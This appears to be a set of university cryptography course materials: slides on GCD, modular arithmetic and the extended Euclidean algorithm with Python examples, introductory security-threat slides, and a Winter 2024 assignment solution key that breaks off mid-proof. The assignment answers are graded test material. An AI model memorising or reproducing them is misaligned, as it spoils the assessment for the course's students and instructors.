– 3 is the divisor,
– -4 is called the quotient, and
– 1 is called the remainder.
Greatest Common Divisor (GCD)

• Definition: Let a and b be integers, b nonzero. The largest integer d such that d | a and d | b is called the greatest common divisor of a and b, denoted by gcd(a, b).
– Example 1: What is gcd(48, 72)?
• The positive common divisors of 48 and 72 are 1, 2, 3, 4, 6, 8, 12, and 24, so gcd(48, 72) = 24.
– Example 2: What is gcd(19, 72)?
• The only positive common divisor of 19 and 72 is 1, so gcd(19, 72) = 1.

• Property: gcd(a, b) = gcd(a − kb, b)
– very useful for simplifying calculations.
– please refer to the supplementary document for the proof.
• Understanding GCD's Importance in Cryptography
– especially crucial in algorithms such as RSA.
– key generation and encryption/decryption processes often involve GCD calculations.

Relatively Prime Integers

• Definition: Two integers a and b are relatively prime (or coprime) if gcd(a, b) = 1.
• Examples:
– Are 15 and 28 relatively prime?
• Yes, gcd(15, 28) = 1.
– Are 55 and 28 relatively prime?
• Yes, gcd(55, 28) = 1.
– Are 35 and 28 relatively prime?
• No, gcd(35, 28) = 7.

Find Greatest Common Divisor

• Using prime factorizations:
Denote a = p1^a1 p2^a2 … pn^an, b = p1^b1 p2^b2 … pn^bn, where p1 < p2 < … < pn and ai, bi ∈ ℕ for 1 ≤ i ≤ n; then gcd(a, b) = p1^min(a1, b1) p2^min(a2, b2) … pn^min(an, bn)
• Example: gcd(a, b)
a = 60 = 2^2 3^1 5^1
b = 54 = 2^1 3^3 5^0
gcd(a, b) = 2^1 3^1 5^0 = 6

Pairwise Relatively Prime Integers

• Definition: The integers a1, a2, …, an are pairwise relatively prime if gcd(ai, aj) = 1 whenever 1 ≤ i < j ≤ n.
• Examples:
– Are 15, 17, and 27 pairwise relatively prime?
• No, because gcd(15, 27) = 3.
– Are 15, 17, and 28 pairwise relatively prime?
• Yes, because gcd(15, 17) = 1, gcd(15, 28) = 1 and gcd(17, 28) = 1.
Modular Arithmetic

• Definition: Modular Arithmetic is a system of arithmetic for integers, where numbers start back at zero after reaching a certain value, known as the modulus.
• Example: A clock. When we reach 12 o'clock, the next hour starts back at 1. Similarly, in Modular Arithmetic, if our modulus is 12, after counting to 11, we go back to 0.
• Applications:
– Public-Key Cryptosystems, RSA encryption and decryption, Generating Digital Signatures, Diffie-Hellman Key Exchange

• Let a be an integer and n be a positive integer. We denote by a mod n the remainder when a is divided by n.
• r ≡ a mod n
– a = qn + r
– r is the non-negative remainder when n divides a
– n is called the modulus
– we’re in CS, so we also write r = a mod n
• Example:
– 9 mod 4 = 1
– 9 mod 3 = 0
– 9 mod 10 = 9
– −11 mod 7 = 3

Modular Arithmetic: The Clock Example

Image courtesy of Bernard Darnton

Clockwise Motion: Moving 4 hours ahead from 10 o'clock results in 2 o'clock, showcasing the 'wrapping around' principle in modular arithmetic, similar to working with a clock, where you always stay within the 1 to 12 range.
Congruences

• Let a and b be integers and n be a positive integer. We say that a is congruent to b modulo n if n divides a – b.
• We use the notation a ≡ b (mod n) to indicate that a is congruent to b modulo n.
• a ≡ b (mod n) if and only if a mod n = b mod n.

• Examples:
– Is it true that 46 ≡ 68 (mod 11)?
• Yes, because 11 | (46 – 68).
– Is it true that 46 ≡ 68 (mod 22)?
• Yes, because 22 | (46 – 68).
– For which integers z is it true that z ≡ 12 (mod 10)?
• It is true for any z ∈ {…, -28, -18, -8, 2, 12, 22, 32, …}

Modular Arithmetic

• The (mod n) operator maps all integers into the set of integers {0, 1, …, (n-1)}, denoted by Zn.
• Example: Z5 = {0, 1, 2, 3, 4}
• This suggests the question: Can we perform arithmetic operations within the confines of this set?
• It turns out that we can; this technique is known as modular arithmetic.
• This property enables manageable handling of large numbers in cryptography by limiting their size.

Congruences

• Theorem: Let n be a positive integer. The integers a and b are congruent modulo n if and only if there is an integer k such that a = b + kn.
– In other words, a ≡ b (mod n) ⇔ n | (a − b)
• Properties:
– a ≡ b (mod n) ⇔ b ≡ a (mod n)
– if a ≡ b (mod n) and b ≡ c (mod n), then a ≡ c (mod n)
• Examples:
– 23 ≡ 8 (mod 5) because 23 - 8 = 15 = 5 * 3
– -11 ≡ 5 (mod 8) because -11 - 5 = -16 = 8 * (-2)
– 81 ≡ 0 (mod 27) because 81 - 0 = 81 = 27 * 3

• Theorem: Let n be a positive integer. If a ≡ b (mod n) and c ≡ d (mod n), then a + c ≡ b + d (mod n) and ac ≡ bd (mod n).
• Proof:
– We know that a ≡ b (mod n) and c ≡ d (mod n) implies that there are integers s and t with b = a + sn and d = c + tn.
– Therefore, b + d = (a + sn) + (c + tn) = (a + c) + n(s + t) and bd = (a + sn)(c + tn) = ac + n(at + cs + stn).
– Hence, a + c ≡ b + d (mod n) and ac ≡ bd (mod n).

Modular Arithmetic Operations

• Modular Addition and Multiplication
– Arithmetic operations within the set Zn = {0, 1, …, (n-1)}
– Examples: (5 + 7) mod 10 = ? (5 * 7) mod 10 = ?
• Properties:
– (a + b) mod n = [(a mod n) + (b mod n)] mod n
– (a - b) mod n = [(a mod n) - (b mod n)] mod n
– (a * b) mod n = [(a mod n) * (b mod n)] mod n
• More examples
– (978 + 1047) mod 10 = ?
– (111 * 112) mod 10 = ?
• Modular Exponentiation
– Can be done by repeated multiplication
– 2^7 mod 5 = ?
– 11^5 mod 13 = ?
Properties of Modular Arithmetic in Zn

Table can be found on page 56 in the textbook.

Additive and Multiplicative Identities

• Building blocks of many operations in cryptography
• Additive Identity in Modular Arithmetic:
– 0 + w = w mod n
• Multiplicative Identity in Modular Arithmetic:
– 1 × w = w mod n

Additive Inverse

• Definition: The number which, when added to the original number, results in zero.
• Standard Arithmetic Example: a + (-a) = 0
• Modular Arithmetic Context: a + b = 0 mod n
• Each element within Zn has an additive inverse
• Calculation: If a ≠ 0, then b = n – a

Table: Addition modulo 8

Multiplicative Inverse

• Definition: The multiplicative inverse of a number a is another number b such that a × b = 1
• Modular Context: looking for a number b such that a × b = 1 mod n
• Existence: a multiplicative inverse exists only if a and n are coprime (their greatest common divisor is 1).
• Example: the multiplicative inverse of 3 mod 11? the multiplicative inverse of 5 mod 8?
• Application: used in cryptography to ensure the operation can be reversed (decryption).
• How to find: Extended Euclidean Algorithm

Table: Multiplication modulo 8

Additive and Multiplicative Inverses
Summary

• Divisibility
– understanding integer division without remainders
– relevance to number theory and cryptography
• Greatest Common Divisors (GCD)
– determines coprimality, vital for RSA
– crucial for cryptographic algorithms
• Modular Arithmetic
– operations within a finite number set
– fundamental for encryption/decryption security
The Euclidean Algorithm

• One of the basic techniques of number theory.
• The Euclidean Algorithm is a simple procedure for finding the greatest common divisor of two positive integers a and b.

• Recall the property of GCD: gcd(a, b) = gcd(a − kb, b) = gcd(b, a − kb) = gcd(b, a mod b)
• In pseudocode, the algorithm can be implemented as follows:
– base case
– recursive case
• Example: gcd(1180, 482)
– The last non-zero remainder is the gcd
Extended Euclidean Algorithm

• Bézout’s Theorem: ∀a, b ∈ ℕ, ∃s, t ∈ ℤ such that sa + tb = gcd(a, b); computing them is called the Extended Euclidean algorithm
• An extension of the Euclidean Algorithm.
• It not only calculates the GCD of two integers, but also finds the coefficients s and t that satisfy the equation sa + tb = gcd(a, b)
• Example:
– a = 3, b = 5, gcd(a, b) = 1
– 2*3 + (-1)*5 = 1 (solution: s = 2, t = -1)

Find Multiplicative Inverse

• The Extended Euclidean Algorithm can be used to calculate the multiplicative inverse of a mod n, if a and n are relatively prime.
• The multiplicative inverse of a mod n is b mod n if and only if ab ≡ 1 (mod n).
• We know gcd(a, n) = 1; by Bézout’s Theorem, there exist integers s and t such that sa + tn = 1.
• So we have 1 = (sa + tn) mod n = sa mod n.
• This means s mod n is the multiplicative inverse of a mod n.

Pseudocode

– base case
– recursive case
– extended part
We use div to indicate integer division. For example, 5 div 2 evaluates to 2, not 2.5.

Implementation Code

Extended Euclidean Algorithm

(-10)*35 + 13*27 = 1

Question: what is the multiplicative inverse of 35 mod 27?
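The recursive Euclidean and extended Euclidean algorithms, the division-algorithm remainder, and the inverse-from-Bézout step, as an added Python example (this is not the course's own implementation code). It reproduces the slides' cases, including the coefficients (-10, 13) for 35 and 27, and answers the question above; the function names are mine.

```python
"""Euclidean and extended Euclidean algorithms (added example, not the lecture's code).

Follows the recursive form on the slides: gcd(a, b) = gcd(b, a mod b) with base case
gcd(a, 0) = a, extended to return Bézout coefficients s, t with s*a + t*b = gcd(a, b),
and from those the multiplicative inverse of a mod n when gcd(a, n) = 1.
Worked cases from the slides: gcd(1180, 482) = 2; 2*3 + (-1)*5 = 1;
(-10)*35 + 13*27 = 1, hence the inverse of 35 mod 27 is -10 mod 27 = 17.
"""


def gcd(a, b):
    """Euclid's algorithm: the last non-zero remainder is the gcd."""
    a, b = abs(a), abs(b)
    while b:                    # recursive case gcd(a, b) = gcd(b, a mod b), as a loop
        a, b = b, a % b
    return a                    # base case gcd(a, 0) = a


def extended_gcd(a, b):
    """Return (g, s, t) with g = gcd(a, b) and s*a + t*b = g (Bézout's identity)."""
    if b == 0:                                   # base case: gcd(a, 0) = a = 1*a + 0*b
        return a, 1, 0
    g, s1, t1 = extended_gcd(b, a % b)           # recursive case: s1*b + t1*(a mod b) = g
    # extended part: substitute a mod b = a - (a div b)*b to express g via a and b
    return g, t1, s1 - (a // b) * t1


def mod_inverse(a, n):
    """Multiplicative inverse of a modulo n, or None when a and n are not coprime.
    From s*a + t*n = 1 we get s*a ≡ 1 (mod n), so s mod n is the inverse."""
    g, s, _ = extended_gcd(a % n, n)
    if g != 1:
        return None
    return s % n


def division_algorithm(a, d):
    """Unique (q, r) with a = d*q + r and 0 <= r < d, e.g. -11 = 3*(-4) + 1.
    Python's divmod already uses this non-negative-remainder convention for d > 0."""
    if d <= 0:
        raise ValueError("divisor must be a positive integer")
    q, r = divmod(a, d)
    assert a == d * q + r and 0 <= r < d
    return q, r


if __name__ == "__main__":
    print("gcd(1180, 482) =", gcd(1180, 482))                  # 2
    print("extended_gcd(3, 5) =", extended_gcd(3, 5))          # (1, 2, -1)
    print("extended_gcd(35, 27) =", extended_gcd(35, 27))      # (1, -10, 13)
    print("inverse of 35 mod 27 =", mod_inverse(35, 27))       # 17
    print("inverse of 3 mod 11 =", mod_inverse(3, 11))         # 4
    print("inverse of 5 mod 8 =", mod_inverse(5, 8))           # 5
    print("inverse of 35 mod 28 =", mod_inverse(35, 28))       # None, gcd(35, 28) = 7
    print("-11 divided by 3 ->", division_algorithm(-11, 3))   # (-4, 1)
```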
Summary

• Euclidean Algorithm
– finding GCDs
• Extended Euclidean Algorithm
– finding multiplicative inverses in modular arithmetic

Slides References

• University of Maryland CMSC 203
• University of Washington CSE 311

• Questions?
Introduction to Cryptography
CIS 4520
Introduction to Information Security

Instructor: Dr. Wenjing Zhang
[email protected]
School of Computer Science
University of Guelph

Outline

• Background
‒ Why study security, evolution of cyber threats and attack techniques, consequences
• Security: the key concepts
‒ Meaning of security, vulnerabilities, threats, and controls
• The Controls
‒ Methods of defense, security lifecycle, principle of effectiveness
Why Study Security?
Adversaries/ computer criminals:
People attack systems and do damage
Why do they attack?
Financial motivation
Industrial spying
Angry employees
Bored teenagers
….
How do they attack?
Network attacks
Exploit vulnerabilities in applications and security mechanisms
Physical access
….
Whom do they attack?
Banks
Government agencies
E-commerce web sites
Hollywood
Universities (playground)
….

3
Universities Are (Still?) Prime Targets

Universities often
run systems with vulnerabilities
have little monitoring
have little management
Universities promote free exchange of ideas
wide access
Student population frequently changes
old accounts stay around
often student workers (little training)
Many departments
one dept. doesn’t always know what the other is doing
Evolution of Cyber Threats and Attack Techniques

Bıçakcı, Salih, F. Doruk Ergun, and Mitat Çelikpala. "The Cyber security scene in Turkey." Sinan Ülgen, Grace Kim (szerk.): A primer on cyber security in Turkey: and the case of nuclear power (2015): 22-51.

6
Cybersecurity Attacks
BOTS
‒ Short for "robots," these are automated software programs that perform tasks
on the internet, which can include malicious activities like launching attacks.

Malicious Code
‒ This refers to software or scripts that are intended to cause harm to a computer,
server, client, or network.

Zombies
‒ Computers that have been infected by a virus or a Trojan horse and can be
controlled remotely for malicious purposes, often part of a botnet.

Morphing
‒ In the context of cybersecurity, this might refer to code that changes its
appearance or structure to evade detection by security software.

Distributed Attack Tools


‒ Software systems that are used to launch coordinated attacks from multiple
computers or networks (often involving zombies).

7
Cybersecurity Attacks (cont’d)
"Stealth" / Advanced Scanning Techniques
‒ Methods of scanning or probing systems in a way that avoids detection by
standard security measures.

Malicious Code WWW Attacks
‒ Attacks specifically targeting websites or web services, such as SQL injection or
cross-site scripting (XSS), which will be introduced at the end of this course.

Automated Probes/Scans
‒ The use of automated software to scan a network or system to identify
vulnerabilities that can be exploited.

Denial of Service
‒ The goal here is to shut down a machine or network, making it inaccessible to its
intended users by overwhelming it with traffic.

GUI attack
‒ Harmful actions aimed at the visual elements—like windows, icons, and
buttons—of software or operating systems through which users interact, such as
Clickjacking or Fake Dialog Boxes.

8
Cybersecurity Attacks (cont’d)
Packet Spoofing
‒ Sending packets to a computer with a false IP address to trick it into accepting
them as legitimate.

Network Management Diagnostics


‒ Tools used to manage and diagnose network issues, which can be exploited by
attackers if not properly secured.

Sniffers
‒ Software or hardware tools used to monitor and capture data packets as they
travel across the network.

Sweepers
‒ Tools that automatically scan networks or systems for vulnerabilities.

Hijacking Sessions
‒ Taking control of a user's session to gain unauthorized access to a system or data.

9
Cybersecurity Attacks (cont’d)
Disabling Audits
‒ Turning off or interfering with security auditing systems to avoid detection.

Exploiting Known Vulnerabilities


‒ Taking advantage of security holes for which fixes are known but not yet applied.

Password Cracking
‒ Using various techniques to guess or decipher a user's password.

Self-Replicating Code
‒ Code that can copy itself from one system to another, like a worm.

Password Guessing
‒ Attempting to log into a system by guessing passwords.

10
How big is the problem?

https://www.embroker.com/blog/cyber-attack-statistics/
How big is the problem?
Biggest Data Breach Incidents in Recent Years

1. Zoetop Business Company (SHEIN & ROMWE) (2022): Impact: 39 million customer accounts; names, dates of birth, email addresses and passwords, phone numbers; cost: $350 million
2. Crypto.com (2022): Impact: 500 customers; cryptocurrency was stolen; cost: $18 million worth of Bitcoin and $15 million worth of Ethereum, plus other cryptocurrencies
3. Yahoo (2013-2014): Impact: 3 billion user accounts; names, dates of birth, email addresses and passwords, phone numbers; cost: $350 million
4. Marriott (2014-2018): Impact: 500 million customers; name and contact, passport number, travel info, and credit card numbers etc.; cost: unknown
5. Uber (2016, 57M+600K); Chase (2014, 76M); OPM (2012-2014, 22M); Target (2013, 162M); Sony (2011, 77M); RSA security (2011, 40M), etc…
How big is the problem? (cont’d)
Data Breach Incidents reported

How big is the problem? (cont’d)
Internet Security Incidents reported
How big is the problem? (cont’d)
Internet attacks are increasing in frequency, severity, and sophistication

Denial of service (DoS) attacks
Cost $1.2 billion in 2000
1999 CSI/FBI survey: 32% of respondents detected DoS attacks directed at their systems
Yahoo, Amazon, eBay, Microsoft, White House, etc., attacked
Mirai Botnet (2016): infiltrated IoT devices, 600K infected, 600Gbps traffic, led to the Dyn attack, disrupted websites: Airbnb, GitHub, Netflix, Twitter, etc.

How big is the problem? (cont’d)

In the first half year of 2005, 237 million network attacks launched
IBM Global Business Security Index Report

In 2005, U.S. businesses lost 67.2 billion dollars due to attacks
2006 Computer Crime and Security Survey by FBI and CSI

Virus and worms
Melissa, Nimda, Code Red, Code Red II, Slammer, Stuxnet, Flame, ILOVEYOU…
Caused over $28 billion in economic losses in 2003, growing to over $75 billion in economic losses by 2007.
Code Red (2001): in 13 hours infected >360K machines - $2.4 billion loss
Slammer (2003): in 10 minutes infected >75K machines - $1 billion loss
CryptoLocker (2013): ransomware, 500,000 victims, cost $30M in 100 days
Stuxnet (2010): SCADA in nuclear plants; may destroy the centrifuge

How serious is the problem?

E.g., December 2015 Ukraine power grid cyberattack: 230K people were left without electricity for a period from 1 to 6 hours
https://en.wikipedia.org/wiki/December_2015_Ukraine_power_grid_cyberattack
Why does this happen?

Lack of encryption and secure protocol design
Lots of buggy software...
Some contributing factors:
Few courses in computer security
Programming text books do not emphasize security
Few security audits
C is an unsafe language
Programmers are lazy
Legacy software
Security mechanisms are difficult to use
Security is expensive and takes time
[Figure: ICS attack vector breakdown]
Insider threat
Easy to hide code in large software packages
Difficult to discover hidden malicious code
Strict development rules and physical security help
Human factors
Social engineering

Security has become one of the hottest jobs even with downturn of economy
19
Example Security Incident: The Stuxnet Worm (2010)
Targeted Iranian nuclear power plants.

Is the first discovered malware that spies on and subverts industrial systems (supervisory control and data acquisition (SCADA))

“The attacks seem designed to force a change in the centrifuge’s rotor speed, first raising the speed and then lowering it, likely with the intention of inducing excessive vibrations or distortions that would destroy the centrifuge.”

The Stuxnet worm is initially spread using infected removable drives such as USB flash drives.

http://en.wikipedia.org/wiki/Stuxnet

20
Outline

• Background
‒ Why study security, evolution of cyber threats and attack
techniques, consequences

• Security: the key concepts


‒ Meaning of security, vulnerabilities, threats, and controls

• The Controls
‒ Methods of defense, security lifecycle, principle of
effectiveness

21
Vulnerability, Threats, Attack
Vulnerability: a security weakness that might be exploited to cause undesired consequences

Threat: a set of circumstances that potentially cause loss or harm.

Attack: the exploitation of vulnerabilities by threats.

22
Vulnerability vs. Threats

Water is the threat
Crack is the vulnerability

Threats can be:
human initiated
computer initiated

Threats can be:
attacks
mistakes
failures

23
Controls

A control is a protective measure

A threat is blocked by a control of a vulnerability

24
Category of Security Attacks

Passive attacks
Eavesdropping
Traffic analysis

Active attacks
Masquerade, modification, insertion, delay, replay,
deletion

25
Passive Attacks
Eavesdropping
‒ This is like listening secretly to someone's conversation. In
technology, it means someone is secretly monitoring what
you are doing online.

Traffic Analysis
‒ This is when someone monitors the flow of information on
the internet to learn something, such as when you're online
and what websites you visit.

26
Active Attacks
Masquerade
‒ This is when the attacker pretends to be someone else to get unauthorized
access.

Modification
‒ Changing the information in a message, like the amount in a bank transfer.

Insertion
‒ Adding extra information or messages that weren't there before.

Delay
‒ Holding up the information on purpose, so it arrives late.

Replay
‒ Sending the same information again to confuse or trick the system.

Deletion
‒ Removing information so it never reaches the intended recipient.

27
Notions of Security
Think as many concepts as you can relate to security in our
everyday world

E.g., Add a lock to a door to control entry access


E.g., Add a watermark to a bank note to prevent counterfeiting
E.g., Hieroglyphics in ancient Egypt - a form of encryption

28
Meaning of Information Security
Security should provide:
‒ Confidentiality
‒ Integrity
‒ Availability (implies timely availability)

The CIA notion

Other factors?
‒ Authentication
‒ Authorization
‒ Non-Repudiation
‒ Privacy

29
The CIA Notion
Confidentiality
Restricting access to information only to authorized
entities

Integrity
Ensuring that the information has not been altered
by an unauthorized entity

Availability
Ensuring the accessibility and usability of a system
or resource by an authorized entity

30
Other Factors
Authentication
ID Authentication
Association of an identity to an entity

Message Authentication
Association of a message to an entity, i.e. verifying the source of a
message

Authorization
Granting or denying rights to access and use resources to a
verified entity within a system

Non-repudiation
Preventing the denial of previous commitments or actions (think
of a contract)

Privacy
Keeping data, whereabouts, associations, identity, etc. private

31
Information & Network Security

Information Security
Information: Commodity distributed via a network
Protection of the information has to do with information security
E.g.: Encryption prevents unauthorized users from eavesdropping data

Network Security
Network: An infrastructure for distributing information
Protection of the network availability to enable information delivery
E.g.: Adversary launches a Denial-of-Service attack on a website server
that becomes unavailable

32
Outline

• Background
‒ Why study security, evolution of cyber threats and attack
techniques, consequences

• Security: the key concepts


‒ Meaning of security, vulnerabilities, threats, and controls

• The Controls
‒ Methods of defense, security lifecycle, principle of
effectiveness

33
Methods of Defense

Prevent - close vulnerability
Deter - make attack more difficult
Deflect - make another target attractive
Mitigate - make attack’s impact less severe
Detect - know when attack occurs
Recover - mitigate attack’s effects

34
Defense: Physical

Stop attacks using something tangible

Examples
locks, cables
guards
fire extinguisher
backups (including off-site)

35
Defense: Procedural/Administrative

Require/Instruct people how to react

Examples:
laws, regulations
policies and procedures
Proper use of passwords (password policies)
What not to write in email
What not to say over the phone
What not to say to strangers (or let be overheard)
Probes for stock insider info, HIPAA, etc.
Documents to shred or not
copyrights, contracts, agreements
Very important, often overlooked

36
Defense: Technical

Counter threats with technologies
Hardware
Software

Hardware Controls
smart cards, user identification devices
circuit boards that control access to storage media
firewalls, IDS

37
Defense: Technical

Software Controls
OS, network access controls
protect OS, net from users
protect users from each other
internal program controls
part of program
enforces security restrictions
e.g., access ctrl in DBMS
independent control programs
e.g., password checkers, IDS, antivirus, encryption
development controls
quality standards during: design, coding, testing,
maintenance

38
The Security Lifecycle

39
Principle of Effectiveness

Controls must be used and used properly to be effective

They must be:
efficient
easy to use
appropriate

40
Reading Assignment for Next Class

Finish Chapter 2 (2.1-2.4) of Stallings, and Chapter 3 (3.1, 3.2).

41
The equality gcd(a, b) = gcd(a - kb, b) can be proven using the properties of the greatest common divisor (GCD) and the concept of divisibility. Here's a general outline of the proof:

Let d be the greatest common divisor of a and b, so d is the largest integer that divides both a and b without leaving a remainder. This means there exist integers m and n such that:
a = md
b = nd

Now consider the integer a - kb, where k is any integer. We can express a - kb as:
a - kb = md - k(nd) = md - knd = d(m - kn)

Since d divides b (because b = nd), d also divides kb (because kb = k(nd)). Together with the expression above, d divides both b and a - kb, so d is a common divisor of a - kb and b.

Now we need to show that d is the greatest such integer. Assume there is another divisor d′ greater than d that divides both a - kb and b. Then d′ also divides kb (a multiple of b), and hence divides the sum (a - kb) + kb = a. So d′ divides both a and b, which makes d′ a common divisor of a and b greater than d, a contradiction because d is the greatest common divisor of a and b.

Therefore, no such d′ can exist, and d is also the greatest common divisor of a - kb and b. Hence, we have:
gcd(a, b) = gcd(a - kb, b)

This concludes the proof.


CIS 4520 Introduction to Cryptography, Winter 2024
Assignment 1 Solution

Instructor: Dr. Wenjing Zhang

Due Date: February 2, 2024 (Friday), 11:59pm.


Format: Please type your solutions and submit a pdf of your solutions in CourseLink.
Total Points: 10 points

Problem 1 (1 point). Given a ciphertext JSSXFEPP encrypted by Shift Cipher, compute the key of
shift cipher and the original message using brute-force attacks. In this problem, we assume the original
message is English and is human-readable. The message space includes all the lower case characters, i.e.,
M = {a, b, ..., z}, key space is K = {0, 1, ..., 25} and ciphertext space is C = {A, B, ..., Z}.

Solution: Given a ciphertext JSSXFEPP, if k = 1, shift left by 1, and output irrwedoo, does not make
sense; if k = 2, shift left by 2, and output hqqvdann; if k = 3, shift left by 3, and output gppucbmm; if
k = 4, shift left by 4, and output football, which makes sense. Therefore, key is k = 4 and message is
football.

Problem 2 (1 point). (a) Given an encryption key (i.e., a permutation) of Substitution Cipher
presented below, compute the ciphertext of a message cincinnatibearcats.

abcdefghijklmnopqrstuvwxyz
EXAUNDKBMVORQCSFHYGWZLJITP

Solution: Based on the above table, ciphertext for cincinnatibearcats is AMCAMCCEWMXNEYAEWG.

(b) If the message space of Substitution Cipher has a number of 100 unique characters/symbols, what
is the size of the key space? In other words, how many permutations in total?

Solution: The size of the key space is 100!

Problem 3 (1.5 points). Assume the key of Vigenere Cipher is bears,

– (a) What is the ciphertext of a message dataprivacy encrypted by this key using Vigenere Cipher?
– (b) What is the size of the key space for Vigenere Cipher if each key is a string of 100 characters?
For easy calculation, a mapping table between characters (a, ..., z) and integers (0, ..., 25) is listed below.

a b c d e f g h i j k l m n o p q r s t u v w x y z
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

Solution: Based on the algorithm of Vigenere Cipher, the encryption of this message should be computed as follows:

d a t a p r i v a c y
b e a r s b e a r s b

We represent the message and the key as integers based on the provided table and add them modulo 26 to get a new set of integers. We convert these integers back to characters using the same table provided above to get the ciphertext EETRHSMVRUZ.

Given t = 100, the size of the key space for Vigenere Cipher is $26^{100}$.

Problem 4 (1.5 points). Assume we have a sequence of 200 characters, the frequency distribution of
different characters is listed below, compute the (approximate) index of coincidence (IC) of this sequence.

char a b c d e f g h i j k l m n o p q r s t u v w x y z
frequency 1 1 1 1 1 1 1 1 1 1 5 5 5 5 5 5 5 5 10 20 20 20 20 20 20 20

Solution: Compute the (approximate) index of coincidence as follows:

$$
\mathrm{IC} \approx \sum_{i=1}^{26} \left(\frac{n_i}{N}\right)^2
= 10 \times \left(\frac{1}{200}\right)^2 + 8 \times \left(\frac{5}{200}\right)^2 + 1 \times \left(\frac{10}{200}\right)^2 + 7 \times \left(\frac{20}{200}\right)^2
= 0.07775
$$

Problem 5 (1 point). An adversary analyzes a sequence of (ciphertext) characters, which is encrypted by Vigenere Cipher, using Kasiski’s method. In addition, it knows the key length is at least 2. If it can find a sub-string “edlt”, which is repeated twice in the sequence, and the distance between the two repeated sub-strings is 12, what are the possible key lengths of this Vigenere Cipher?

Solution: The distance between two repeated sub-strings could be a multiple of the key length, which means the key length could be in {2, 3, 4, 6, 12}.

Problem 6 (1 point). Assume an attacker knows the index of coincidence in plaintext is ICplain =
0.234. Given a long sequence of (ciphertext) characters, e.g.,

c1 c2 c3 c4 c5 c6 c7 c8 c9 .........

which is encrypted by Vigenere Cipher, please describe how to calculate/estimate the key length by using
the index of coincidence.

Solution:
1. We start with an estimated key length j = 1.
2. We then calculate the IC of the subsequence of the ciphertext $c_1, c_{1+j}, c_{1+2j}, c_{1+3j}, \ldots$
3. If the calculated IC is close to 0.234, the key length is j.
4. If it is not close to 0.234, we increment j by 1 and repeat steps 2 and 3 until we find the correct key length.
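The Vigenere encryption of Problem 3, the IC approximation of Problem 4 and the key-length procedure of Problem 6, as an added Python example (not part of the assignment solutions); the toy plaintext, key and tolerance are constructed for the demonstration.

```python
"""Vigenere cipher, index of coincidence and IC-based key-length estimation.

Added example for A1 Problems 3, 4 and 6; not from the course materials.
"""
from collections import Counter
from string import ascii_lowercase

ALPHABET = ascii_lowercase            # a..z <-> 0..25, as in the mapping table


def vigenere_encrypt(plaintext, key):
    """c_i = (m_i + k_(i mod t)) mod 26; lower-case letters in, upper-case out."""
    t = len(key)
    out = []
    for i, ch in enumerate(plaintext):
        m = ALPHABET.index(ch)
        k = ALPHABET.index(key[i % t])
        out.append(ALPHABET[(m + k) % 26].upper())
    return "".join(out)


def ic_from_counts(counts):
    """Approximate IC = sum_i (n_i / N)^2 over the per-letter counts n_i."""
    n = sum(counts)
    return sum((c / n) ** 2 for c in counts)


def index_of_coincidence(text):
    """IC of a letter sequence (case-insensitive), same approximation."""
    return ic_from_counts(Counter(text.lower()).values())


def estimate_key_length(ciphertext, ic_plain, max_len=20, tol=0.05):
    """Problem 6 procedure: for j = 1, 2, ... take the subsequence
    c_1, c_{1+j}, c_{1+2j}, ... and stop at the first j whose IC is within
    tol of the plaintext IC.  Returns None if no j <= max_len qualifies."""
    for j in range(1, max_len + 1):
        subseq = ciphertext[0::j]                 # c_1, c_{1+j}, c_{1+2j}, ...
        if abs(index_of_coincidence(subseq) - ic_plain) < tol:
            return j
    return None


# Problem 4's frequency table: 10 letters x1, 8 letters x5, 1 letter x10, 7 letters x20.
PROBLEM4_COUNTS = [1] * 10 + [5] * 8 + [10] + [20] * 7

# Constructed toy plaintext (not from the assignment): "the" repeated 50 times, so its
# letter distribution is known exactly (IC = 1/3) and the expected values are checkable.
TOY_PLAINTEXT = "the" * 50
TOY_KEY = "bears"


if __name__ == "__main__":
    print(vigenere_encrypt("dataprivacy", "bears"))           # EETRHSMVRUZ
    print(round(ic_from_counts(PROBLEM4_COUNTS), 5))          # 0.07775
    ct = vigenere_encrypt(TOY_PLAINTEXT, TOY_KEY)
    for j in range(1, 7):                                     # IC of each candidate
        print(j, round(index_of_coincidence(ct[0::j]), 4))    # only j = 5 is near 1/3
    print("estimated key length:", estimate_key_length(ct, 1 / 3))   # 5
```

For j = 1..4 the subsequences still mix all five key letters, so their IC stays far below the plaintext IC; at j = 5 every sampled character is shifted by the same key letter and the plaintext IC reappears.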

Problem 7 (1.5 points). Assume we use Shift Cipher, and the message space is M = {aa, ab, bc}, where Pr[M = aa] = 0.3, Pr[M = ab] = 0.4, Pr[M = bc] = 0.3. In addition, we assume the key space is K = {0, 1, 2, ..., 25} and it is uniformly distributed, i.e., Pr[K = k] = 1/26, for any k ∈ [0, 25]. What is the probability that a ciphertext is XY?

Solution: If M = aa, no key can generate a ciphertext C = XY.

$$\Pr[C = XY \mid M = aa] = 0$$

If M = ab and K = 23, then C = XY.

$$\Pr[C = XY \mid M = ab] = \Pr[M = ab \cap K = 23] = \Pr[M = ab] \times \Pr[K = 23] = 0.4 \times \frac{1}{26}$$

If M = bc and K = 22, then C = XY.

$$\Pr[C = XY \mid M = bc] = \Pr[M = bc \cap K = 22] = \Pr[M = bc] \times \Pr[K = 22] = 0.3 \times \frac{1}{26}$$

Therefore, the overall probability that a ciphertext is XY is

$$\Pr[C = XY] = \Pr[C = XY \mid M = aa] + \Pr[C = XY \mid M = ab] + \Pr[C = XY \mid M = bc] = 0 + 0.4 \times \frac{1}{26} + 0.3 \times \frac{1}{26} \approx 0.0269$$

Problem 8 (1.5 points). Describe the formal definition of perfect secrecy. Assume each key has θ bits in a one-time pad; prove this one-time pad is perfectly secure.

Solution:
Perfect Secrecy. An encryption scheme Π = (KeyGen, Enc, Dec) with message space M is perfectly secret if for every probability distribution over M, every message m ∈ M, and every ciphertext c ∈ C:

$$\Pr[M = m \mid C = c] = \Pr[M = m]$$

The following formal definition is also fine.

Perfect Secrecy. An encryption scheme Π = (KeyGen, Enc, Dec) with message space M is perfectly secret if for every m, m′ ∈ M and every c ∈ C

$$\Pr[\mathrm{Enc}_K(m) = c] = \Pr[\mathrm{Enc}_K(m') = c]$$

where the probabilities are over the choice of K and any randomness of Enc.

Prove the one-time pad is perfectly secret: based on Bayes’ Theorem, we know that

$$\Pr[M = m \mid C = c] = \frac{\Pr[C = c \mid M = m] \cdot \Pr[M = m]}{\Pr[C = c]}$$

Therefore we need to prove

$$\frac{\Pr[C = c \mid M = m]}{\Pr[C = c]} = 1$$

For an arbitrary c in ciphertext space C and any m in message space M, we have

